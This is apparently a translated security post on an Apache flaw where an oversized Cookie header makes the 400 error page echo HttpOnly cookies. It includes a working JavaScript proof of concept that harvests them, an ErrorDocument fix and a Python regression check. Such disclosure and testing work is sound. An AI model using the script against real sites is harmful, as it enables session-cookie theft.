Many programs, and some commercial or mature open-source CMS article systems, set the HttpOnly attribute on their cookies to prevent XSS from stealing user cookies: it stops JavaScript from reading the user's cookie directly and so reduces the impact of an XSS. This issue, however, can be used to bypass exactly that HttpOnly attribute.

Open a site in Chrome, press F12 to open the developer tools, go to the console, enter the following code and press Enter:

// http://www.exploit-db.com/exploits/18442/
function setCookies (good) {
    // Construct string for cookie value
    var str = "";
    for (var i=0; i< 819; i++) {
        str += "x";
    }
    // Set cookies
    for (i = 0; i < 10; i++) {
        // Expire evil cookie
        if (good) {
            var cookie = "xss"+i+"=;expires="+new Date(+new Date()-1).toUTCString()+"; path=/;";
        }
        // Set evil cookie
        else {
            var cookie = "xss"+i+"="+str+";path=/";
        }
        document.cookie = cookie;
    }
}

function makeRequest() {
    setCookies();
    function parseCookies () {
        var cookie_dict = {};
        // Only react on 400 status
        if (xhr.readyState === 4 && xhr.status === 400) {
            // Replace newlines and match <pre> content (match() returns null when there is no <pre>)
            var content = xhr.responseText.replace(/\r|\n/g,'').match(/<pre>(.+)<\/pre>/);
            if (content && content.length) {
                // Remove Cookie: prefix
                content = content[1].replace("Cookie: ", "");
                // Drop the xssN padding cookies, then split the remainder on ';'
                var cookies = content.replace(/xss\d=x+;?/g, '').split(/;/g);
                // Add cookies to object (trim the space left after each ';')
                for (var i=0; i<cookies.length; i++) {
                    var s_c = cookies[i].trim().split('=',2);
                    cookie_dict[s_c[0]] = s_c[1];
                }
            }
            // Unset malicious cookies
            setCookies(true);
            alert(JSON.stringify(cookie_dict));
        }
    }
    // Make XHR request
    var xhr = new XMLHttpRequest();
    xhr.onreadystatechange = parseCookies;
    xhr.open("GET", "/", true);
    xhr.send(null);
}

makeRequest();

You will then see the glorious 400 error page containing the cookie information.

Download: https://gist.github.com/pilate/1955a1c28324d4724b7b/download

Fix:

Apache officially provides four ways of handling errors (http://httpd.apache.org/docs/2.0/mod/core.html#errordocument), quoted below:

In the event of a problem or error, Apache can be configured to do one of four things,

1. output a simple hardcoded error message
2. output a customized message
3. redirect to a local URL-path to handle the problem/error
4. redirect to an external URL to handle the problem/error

In my tests, for the 400 error only method 2 is effective; the response then no longer contains the cookie content.

Apache configuration:

ErrorDocument 400 " security test"

Of course, upgrading Apache to the latest version also works :).

Reference: http://httpd.apache.org/security/vulnerabilities_22.html
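As an added regression check (not the original post's code or the gist) for a server you administer after applying the ErrorDocument fix: it rebuilds the oversized Cookie header the script above plants, parses a 400 body the same way that script does, and reports whether any non-padding cookie is echoed back. The SESSIONID cookie, the sample response bodies and the localhost target are constructed assumptions.

```python
"""Regression check for the Apache 400-page cookie leak described above."""
import http.client
import re

# Apache's default LimitRequestFieldSize is 8190 bytes. The script on this page
# plants ten cookies of 819 "x" each so the Cookie header exceeds that limit.
COOKIE_COUNT, COOKIE_VALUE_LEN = 10, 819
# Constructed stand-in for an HttpOnly session cookie (not a real session id).
SECRET_NAME, SECRET_VALUE = "SESSIONID", "s3cr3t-test-value"

def build_probe_cookie_header():
    """Rebuild the oversized Cookie header a browser sends after the page's script ran."""
    filler = "x" * COOKIE_VALUE_LEN
    parts = ["xss%d=%s" % (i, filler) for i in range(COOKIE_COUNT)]
    parts.append("%s=%s" % (SECRET_NAME, SECRET_VALUE))
    return "; ".join(parts)

def leaked_cookies(body):
    """Cookies echoed inside <pre>...</pre> of a 400 page, minus the xssN padding;
    empty dict when the body does not echo the request header at all."""
    match = re.search(r"<pre>(.+?)</pre>", body.replace("\r", "").replace("\n", ""))
    if not match:
        return {}
    content = re.sub(r"xss\d+=x+;?\s*", "", match.group(1).replace("Cookie: ", ""))
    found = {}
    for item in content.split(";"):
        item = item.strip()
        if "=" in item:
            name, value = item.split("=", 1)
            found[name] = value
    return found

# Constructed sample bodies: an unpatched Apache 2.2 400 page, and what the same
# server returns once `ErrorDocument 400 " security test"` is in place.
VULNERABLE_BODY = ("<p>Size of a request header field exceeds server limit.<br />\n"
                   "<pre>\nCookie: " + build_probe_cookie_header() + "\n</pre>\n</p>")
FIXED_BODY = "security test"

def check_server(host, port=80):
    """Send the probe to a server you administer; returns (status, leaked cookies)."""
    conn = http.client.HTTPConnection(host, port, timeout=10)
    conn.request("GET", "/", headers={"Cookie": build_probe_cookie_header()})
    resp = conn.getresponse()
    status, body = resp.status, resp.read().decode("utf-8", "replace")
    conn.close()
    return status, leaked_cookies(body)

if __name__ == "__main__":
    import sys
    print(check_server(sys.argv[1] if len(sys.argv) > 1 else "localhost"))
```

A fixed server should report an empty dict for the leaked cookies regardless of the status code it returns.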